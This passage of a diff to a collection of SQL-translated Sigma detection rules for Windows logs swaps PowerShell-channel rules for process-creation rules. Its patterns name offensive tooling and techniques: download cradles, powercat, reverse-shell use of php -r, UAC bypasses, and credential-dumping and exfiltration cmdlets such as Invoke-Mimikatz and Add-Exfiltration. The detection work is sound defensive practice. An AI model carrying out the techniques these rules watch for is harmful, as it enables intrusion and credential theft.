Channel = 'Windows PowerShell') AND HostApplication LIKE '%' ESCAPE '\\' AND NOT (HostApplication LIKE 'C:\\\\WINDOWS\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe%' ESCAPE '\\' OR ContextInfo LIKE '%Citrix\\\\ConfigSync\\\\ConfigSync.ps1%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%tomcat%' ESCAPE '\\' OR (ParentImage LIKE '%\\\\amigo.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\browser.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\chrome.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\firefox.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE 
'%\\\\iexplore.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\jbosssvc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\microsoftedgecp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MicrosoftEdgeSH.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\outlook.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\safari.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqlagent.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqlserver.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\')) AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR (CommandLine LIKE '%/c powershell%' ESCAPE '\\' OR CommandLine LIKE '%/c pwsh%' ESCAPE '\\') OR Description = 'Windows PowerShell' OR Product = 'PowerShell Core 6' OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')))" ], - "filename": "posh_pc_alternate_powershell_hosts.yml" + "filename": "proc_creation_win_powershell_susp_parent_process.yml" }, { - "title": "PowerShell Downgrade Attack - PowerShell", - "id": "6331d09b-4785-4c13-980f-f96661356249", + "title": "Files And Subdirectories Listing Using Dir", + "id": "7c9340a9-e2ee-4e43-94c5-c54ebbea1006", "status": "experimental", - "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", - "author": "Florian Roth (Nextron Systems), Lee Holmes (idea), Harish Segar (improvements)", + "description": "Detects usage of the \"dir\" command that's part of windows batch/cmd to collect information about directories", + "author": "frack113", "tags": [ - 
"attack.defense_evasion", - "attack.execution", - "attack.t1059.001" + "attack.discovery", + "attack.t1217" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '400' AND Channel = 'Windows PowerShell') AND EngineVersion LIKE '2.%' ESCAPE '\\' AND NOT (HostVersion LIKE '2.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%dir %' ESCAPE '\\' AND CommandLine LIKE '% /s%' ESCAPE '\\' AND CommandLine LIKE '% /b%' ESCAPE '\\')" ], - "filename": "posh_pc_downgrade_attack.yml" + "filename": "proc_creation_win_cmd_dir_execution.yml" }, { - "title": "Nslookup PowerShell Download Cradle", - "id": "999bff6d-dc15-44c9-9f5c-e1051bfc86e1", + "title": "Suspicious Recursive Takeown", + "id": "554601fb-9b71-4bcc-abf4-21a611be4fde", "status": "experimental", - "description": "Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records", - "author": "Sai Prashanth Pulisetti @pulisettis, Aishwarya Singam", + "description": "Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1222.001" ], "falsepositives": [ - "Unknown" + "Scripts created by developers and admins", + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%powershell%' ESCAPE '\\' AND HostApplication LIKE '%nslookup%' ESCAPE '\\' AND (HostApplication LIKE '%-q=txt%' ESCAPE '\\' OR HostApplication LIKE '%-querytype=txt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\takeown.exe' ESCAPE '\\' 
AND CommandLine LIKE '%/f %' ESCAPE '\\' AND CommandLine LIKE '%/r%' ESCAPE '\\')" ], - "filename": "posh_pc_abuse_nslookup_with_dns_records.yml" + "filename": "proc_creation_win_takeown_recursive_own.yml" }, { - "title": "Netcat The Powershell Version", - "id": "c5b20776-639a-49bf-94c7-84f912b91c15", + "title": "TrustedPath UAC Bypass Pattern", + "id": "4ac47ed3-44c2-4b1f-9d51-bf46e8914126", "status": "test", - "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", - "author": "frack113", + "description": "Detects indicators of a UAC bypass method by mocking directories", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1095" + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND (HostApplication LIKE '%powercat %' ESCAPE '\\' OR HostApplication LIKE '%powercat.ps1%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%C:\\\\Windows \\\\System32\\\\%' ESCAPE '\\')" ], - "filename": "posh_pc_powercat.yml" + "filename": "proc_creation_win_uac_bypass_trustedpath.yml" }, { - "title": "Renamed Powershell Under Powershell Channel", - "id": "30a8cb77-8eb3-4cfb-8e79-ad457c5a4592", + "title": "OpenWith.exe Executes Specified Binary", + "id": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", "status": "test", - "description": "Detects renamed powershell", - "author": "Harish Segar, frack113", + "description": "The OpenWith.exe executes other binary", + "author": "Beyu Denis, oscd.community (rule), @harr0ey (idea)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - 
"SELECT * FROM logs WHERE ((EventID = '400' AND Channel = 'Windows PowerShell') AND HostName = 'ConsoleHost' AND NOT ((HostApplication LIKE 'powershell.exe%' ESCAPE '\\' OR HostApplication LIKE 'C:\\\\WINDOWS\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\OpenWith.exe' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\')" ], - "filename": "posh_pc_renamed_powershell.yml" + "filename": "proc_creation_win_lolbin_openwith.yml" }, { - "title": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell Module", - "id": "38a7625e-b2cb-485d-b83d-aff137d859f4", + "title": "User Discovery And Export Via Get-ADUser Cmdlet", + "id": "1114e048-b69c-4f41-bc20-657245ae6e3f", "status": "experimental", - "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", - "author": "frack113", + "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Unknown" + "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Invoke-ATHRemoteFXvGPUDisablementCommand %' ESCAPE '\\' AND (ContextInfo LIKE '%-ModuleName %' ESCAPE '\\' OR ContextInfo LIKE '%-ModulePath %' ESCAPE '\\' OR ContextInfo LIKE '%-ScriptBlock %' ESCAPE '\\' OR ContextInfo LIKE '%-RemoteFXvGPUDisablementFilePath%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID 
= '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Get-ADUser %' ESCAPE '\\' AND CommandLine LIKE '% -Filter \\*' ESCAPE '\\' AND (CommandLine LIKE '% > %' ESCAPE '\\' OR CommandLine LIKE '% | Select %' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%Set-Content%' ESCAPE '\\' OR CommandLine LIKE '%Add-Content%' ESCAPE '\\')))" ], - "filename": "posh_pm_susp_athremotefxvgpudisablementcommand.yml" + "filename": "proc_creation_win_powershell_user_discovery_get_aduser.yml" }, { - "title": "Suspicious PowerShell Invocations - Generic - PowerShell Module", - "id": "bbb80e91-5746-4fbe-8898-122e2cafdbf4", + "title": "New Network Trace Capture Started Via Netsh.EXE", + "id": "d3c3861d-c504-4c77-ba55-224ba82d0118", + "status": "test", + "description": "Detects the execution of netsh with the \"trace\" flag in order to start a network capture", + "author": "Kutepov Anton, oscd.community", + "tags": [ + "attack.discovery", + "attack.credential_access", + "attack.t1040" + ], + "falsepositives": [ + "Legitimate administration activity" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%trace%' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_netsh_packet_capture.yml" + }, + { + "title": "Php Inline Command Execution", + "id": "d81871ef-5738-47ab-9797-7a9c90cd4bfb", "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of php using the \"-r\" flag. 
This is could be used as a way to launch a reverse shell or execute live php code.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1059" ], "falsepositives": [ - "Very special / sneaky PowerShell scripts" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ContextInfo LIKE '% -enc %' ESCAPE '\\' OR ContextInfo LIKE '% -EncodedCommand %' ESCAPE '\\' OR ContextInfo LIKE '% -ec %' ESCAPE '\\') AND (ContextInfo LIKE '% -w hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -window hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -w 1 %' ESCAPE '\\') AND (ContextInfo LIKE '% -noni %' ESCAPE '\\' OR ContextInfo LIKE '% -noninteractive %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\php.exe' ESCAPE '\\' OR OriginalFileName = 'php.exe') AND CommandLine LIKE '% -r%' ESCAPE '\\')" ], - "filename": "posh_pm_susp_invocation_generic.yml" + "filename": "proc_creation_win_php_inline_command_execution.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell Module", - "id": "07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "UAC Bypass Using Disk Cleanup", + "id": "b697e69c-746f-4a86-9f59-7bfff8eab881", + "status": "test", + "description": "Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ 
"Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%set%' ESCAPE '\\' AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%mshta%' ESCAPE '\\' AND Payload LIKE '%vbscript:createobject%' ESCAPE '\\' AND Payload LIKE '%.run%' ESCAPE '\\' AND Payload LIKE '%(window.close)%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\"\\\\system32\\\\cleanmgr.exe /autoclean /d C:' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "posh_pm_invoke_obfuscation_via_use_mhsta.yml" + "filename": "proc_creation_win_uac_bypass_cleanmgr.yml" }, { - "title": "SyncAppvPublishingServer Bypass Powershell Restriction - PS Module", - "id": "fe5ce7eb-dad8-467c-84a9-31ec23bd644a", + "title": "Windows Update Client LOLBIN", + "id": "d7825193-b70a-48a4-b992-8b5b3015cc11", "status": "experimental", - "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", - "author": "Ensar Şamil, @sblmsrsn, OSCD Community", + "description": "Detects code execution via the Windows Update client (wuauclt)", + "author": "FPT.EagleEye Team", "tags": [ - "attack.defense_evasion", + "attack.command_and_control", + "attack.execution", + "attack.t1105", "attack.t1218" ], "falsepositives": [ - "App-V clients" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%SyncAppvPublishingServer.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND 
((Image LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%/UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%/RunHandlerComServer%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /ClassId %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" ], - "filename": "posh_pm_syncappvpublishingserver_exe.yml" + "filename": "proc_creation_win_wuauclt_execution.yml" }, { - "title": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module", - "id": "a23791fe-8846-485a-b16b-ca691e1b03d4", + "title": "Potential COM Objects Download Cradles Usage - Process Creation", + "id": "02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf", "status": "experimental", - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], + "description": "Detects usage of COM objects that can be abused to download files in PowerShell by CLSID", + "author": "frack113", "falsepositives": [ - "Unknown" + "Legitimate use of the library" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%rundll32.exe%' ESCAPE '\\' AND Payload LIKE '%shell32.dll%' ESCAPE '\\' AND Payload LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND Payload LIKE '%powershell%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%[Type]::GetTypeFromCLSID(%' ESCAPE '\\' AND (CommandLine LIKE '%0002DF01-0000-0000-C000-000000000046%' ESCAPE '\\' OR CommandLine LIKE '%F6D90F16-9C73-11D3-B32E-00C04F990BB4%' ESCAPE '\\' OR CommandLine LIKE '%F5078F35-C551-11D3-89B9-0000F81FE221%' ESCAPE '\\' OR CommandLine LIKE '%88d96a0a-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR CommandLine LIKE 
'%AFBA6B42-5692-48EA-8141-DC517DCF0EF1%' ESCAPE '\\' OR CommandLine LIKE '%AFB40FFD-B609-40A3-9828-F88BBE11E4E3%' ESCAPE '\\' OR CommandLine LIKE '%88d96a0b-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR CommandLine LIKE '%2087c2f4-2cef-4953-a8ab-66779b670495%' ESCAPE '\\' OR CommandLine LIKE '%000209FF-0000-0000-C000-000000000046%' ESCAPE '\\' OR CommandLine LIKE '%00024500-0000-0000-C000-000000000046%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_rundll.yml" + "filename": "proc_creation_win_powershell_download_com_cradles.yml" }, { - "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module", - "id": "7034cbbb-cc55-4dc2-8dad-36c0b942e8f1", + "title": "Use of Pcalua For Execution", + "id": "0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2", "status": "experimental", - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects execition of commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting.", + "author": "Nasreddine Bencherchali (Nextron Systems), E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Legitimate use by a via a batch script or by an administrator." 
], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%new-object%' ESCAPE '\\' AND Payload LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND (Payload LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR Payload LIKE '%system.io.streamreader%' ESCAPE '\\') AND Payload LIKE '%readtoend' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\pcalua.exe' ESCAPE '\\' AND CommandLine LIKE '% -a%' ESCAPE '\\')" ], - "filename": "posh_pm_invoke_obfuscation_via_compress.yml" + "filename": "proc_creation_win_lolbin_pcalua.yml" }, { - "title": "Malicious PowerShell Commandlets - PoshModule", - "id": "7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c", + "title": "Suspicious HH.EXE Execution", + "id": "e8a95b5e-c891-46e2-b33a-93937d3abc31", "status": "test", - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a suspicious execution of a Microsoft HTML Help (HH.exe)", + "author": "Maxim Pavlunin", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069", - "attack.t1059.001" + "attack.initial_access", + "attack.t1047", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218", + "attack.t1218.001", + "attack.t1218.010", + "attack.t1218.011", + "attack.t1566", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%Add-Exfiltration%' ESCAPE '\\' OR Payload LIKE 
'%Add-Persistence%' ESCAPE '\\' OR Payload LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR Payload LIKE '%Check-VM%' ESCAPE '\\' OR Payload LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR Payload LIKE '%Decrypt-Hash%' ESCAPE '\\' OR Payload LIKE '%Do-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR Payload LIKE '%Exploit-Jboss%' ESCAPE '\\' OR Payload LIKE '%Find-Fruit%' ESCAPE '\\' OR Payload LIKE '%Find-GPOLocation%' ESCAPE '\\' OR Payload LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR Payload LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR Payload LIKE '%Get-ChromeDump%' ESCAPE '\\' OR Payload LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR Payload LIKE '%Get-FoxDump%' ESCAPE '\\' OR Payload LIKE '%Get-GPPPassword%' ESCAPE '\\' OR Payload LIKE '%Get-IndexedItem%' ESCAPE '\\' OR Payload LIKE '%Get-Keystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-LSASecret%' ESCAPE '\\' OR Payload LIKE '%Get-PassHashes%' ESCAPE '\\' OR Payload LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR Payload LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR Payload LIKE '%Get-RickAstley%' ESCAPE '\\' OR Payload LIKE '%Get-Screenshot%' ESCAPE '\\' OR Payload LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServicePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR Payload LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR Payload LIKE '%Get-System%' ESCAPE '\\' OR Payload LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR Payload LIKE '%Get-UnattendedInstallFile%' 
ESCAPE '\\' OR Payload LIKE '%Get-Unconstrained%' ESCAPE '\\' OR Payload LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-VaultCredential%' ESCAPE '\\' OR Payload LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR Payload LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR Payload LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR Payload LIKE '%HTTP-Login%' ESCAPE '\\' OR Payload LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR Payload LIKE '%Install-SSP%' ESCAPE '\\' OR Payload LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR Payload LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR Payload LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR Payload LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR Payload LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR Payload LIKE '%Invoke-Certify%' ESCAPE '\\' OR Payload LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DAFT%' ESCAPE '\\' OR Payload LIKE '%Invoke-DCSync%' ESCAPE '\\' OR Payload LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR Payload LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR Payload LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR Payload LIKE '%Invoke-Farmer%' ESCAPE '\\' OR Payload LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR Payload LIKE '%Invoke-Gopher%' ESCAPE '\\' OR Payload LIKE '%Invoke-Grouper%' ESCAPE '\\' OR Payload LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR Payload LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' 
OR Payload LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR Payload LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR Payload LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Lockless%' ESCAPE '\\' OR Payload LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR Payload LIKE '%Invoke-MITM6%' ESCAPE '\\' OR Payload LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR Payload LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR Payload LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR Payload LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR Payload LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR Payload LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR Payload LIKE '%Invoke-PortScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR Payload LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR Payload LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-PSInject%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR Payload LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR Payload LIKE '%Invoke-RunAs%' ESCAPE '\\' OR Payload LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR Payload LIKE '%Invoke-SCShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR Payload LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR Payload LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-Sharp%' ESCAPE '\\' OR Payload LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR Payload LIKE 
